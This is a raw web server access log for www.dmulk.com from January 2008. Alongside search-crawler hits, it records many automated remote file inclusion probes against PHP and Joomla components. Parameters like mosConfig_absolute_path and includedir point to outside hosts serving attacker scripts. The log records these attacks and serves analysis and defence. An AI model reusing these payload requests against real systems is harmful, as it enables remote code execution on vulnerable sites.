74.6.29.12 - - [04/Jan/2008:00:18:56 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 26799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.230 - - [04/Jan/2008:00:37:16 -0800] "GET /minamijewelry/html/testimonials.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.9.138 - - [04/Jan/2008:00:39:30 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [04/Jan/2008:00:42:31 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [04/Jan/2008:00:42:31 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [04/Jan/2008:00:42:31 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.118 - - [04/Jan/2008:00:44:18 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.9.138 - - [04/Jan/2008:00:45:41 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [04/Jan/2008:00:45:42 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [04/Jan/2008:00:45:42 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 29125 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.12 - - [04/Jan/2008:00:46:48 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [04/Jan/2008:00:46:48 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [04/Jan/2008:00:46:48 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic22.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:00:47:48 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:00:47:48 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:00:47:48 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.102 - - [04/Jan/2008:00:48:43 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
70.83.110.251 - - [04/Jan/2008:00:50:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
194.0.200.9 - - [04/Jan/2008:00:53:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.200.9 - - [04/Jan/2008:00:53:13 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:55:30 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:55:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:55:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:00:55:43 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:00:55:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:56:44 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:56:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:56:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.232 - - [04/Jan/2008:00:57:09 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:57:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:00:58:09 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:00:58:09 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:00:58:09 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:58:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:59:45 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:59:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:00:59:45 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.106.191 - - [04/Jan/2008:00:59:48 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.106.191 - - [04/Jan/2008:00:59:49 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.118.106.191 - - [04/Jan/2008:00:59:49 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://deniamusic.com/keplek.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.200.9 - - [04/Jan/2008:01:00:04 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:01:17 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:01:17 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:01:17 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:01:01:25 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:01:02:19 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.0.200.9 - - [04/Jan/2008:01:02:27 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.200.9 - - [04/Jan/2008:01:02:27 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:01:03:09 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:04:31 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:04:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:01:05:17 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:01:05:18 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.111.176.102 - - [04/Jan/2008:01:06:58 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.102 - - [04/Jan/2008:01:06:58 -0800] "GET /?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.102 - - [04/Jan/2008:01:06:59 -0800] "GET /logs/?mosConfig_absolute_path=http://sagasufx.com/rulez.txt?? HTTP/1.1" 200 29125 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.200.9 - - [04/Jan/2008:01:08:51 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:01:10:31 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:01:11:11 -0800] "GET /logs/access_071205.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.231 - - [04/Jan/2008:01:11:29 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.48.80.141 - - [04/Jan/2008:01:11:49 -0800] "GET /logs/access_071018.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://207.35.44.70/jeangerard/gerard/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.95.94 - - [04/Jan/2008:01:12:55 -0800] "GET /index.php?pageurl=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.223.95.94 - - [04/Jan/2008:01:12:55 -0800] "GET /logs/index.php?pageurl=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:01:13:13 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.19.200 - - [04/Jan/2008:01:17:25 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.219 - - [04/Jan/2008:01:17:48 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.144 - - [04/Jan/2008:01:22:52 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [04/Jan/2008:01:22:57 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.psytown.com/stats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.20.125.109 - - [04/Jan/2008:01:24:24 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [04/Jan/2008:01:24:24 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.125.109 - - [04/Jan/2008:01:24:25 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [04/Jan/2008:01:24:25 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [04/Jan/2008:01:24:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [04/Jan/2008:01:24:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.156 - - [04/Jan/2008:01:24:42 -0800] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.20.125.109 - - [04/Jan/2008:01:24:55 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [04/Jan/2008:01:25:35 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [04/Jan/2008:01:25:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [04/Jan/2008:01:25:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://filexoom.com/files/92019/paddy/hearth.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.135 - - [04/Jan/2008:01:27:15 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
121.156.105.11 - - [04/Jan/2008:01:27:52 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [04/Jan/2008:01:27:52 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [04/Jan/2008:01:27:53 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [04/Jan/2008:01:28:36 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.191.25.28 - - [04/Jan/2008:01:31:11 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.25.28 - - [04/Jan/2008:01:31:11 -0800] "GET /logs/?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 29125 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.218 - - [04/Jan/2008:01:32:51 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.234.106.5 - - [04/Jan/2008:01:36:53 -0800] "GET /logs/access_071224.log/index.php?redir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [04/Jan/2008:01:36:54 -0800] "GET /index.php?redir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.234.106.5 - - [04/Jan/2008:01:36:54 -0800] "GET /logs/index.php?redir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.196.254.164 - - [04/Jan/2008:01:37:48 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [04/Jan/2008:01:37:48 -0800] "GET /?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
200.196.254.164 - - [04/Jan/2008:01:37:48 -0800] "GET /logs/?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 200 28537 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.25.218 - - [04/Jan/2008:01:42:53 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.25.218 - - [04/Jan/2008:01:42:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.25.218 - - [04/Jan/2008:01:42:54 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:43:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:44:15 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:44:15 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.131.226 - - [04/Jan/2008:01:44:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.maclarenbaby.com/es/file/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:01:45:24 -0800] "GET /logs/access_071212.log/modules/My_eGallery/index.php?basepath=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:01:45:24 -0800] "GET /modules/My_eGallery/index.php?basepath=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [04/Jan/2008:01:45:25 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [04/Jan/2008:01:46:21 -0800] "GET /logs/access_071214.log/?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [04/Jan/2008:01:46:21 -0800] "GET /?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.62.34 - - [04/Jan/2008:01:46:21 -0800] "GET /logs/?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/a.txt????????????????????????????? HTTP/1.1" 200 28537 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [04/Jan/2008:01:48:21 -0800] "GET /logs/access_071224.log/index.php?redir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [04/Jan/2008:01:48:23 -0800] "GET /index.php?redir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [04/Jan/2008:01:48:23 -0800] "GET /logs/index.php?redir=http://www.gumgangfarm.com/shop/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.212.34 - - [04/Jan/2008:01:50:19 -0800] "GET /start.php?s=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.212.34 - - [04/Jan/2008:01:50:19 -0800] "GET /start.php?s=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.82.114.137 - - [04/Jan/2008:01:51:49 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.114.137 - - [04/Jan/2008:01:51:50 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.82.114.137 - - [04/Jan/2008:01:51:50 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
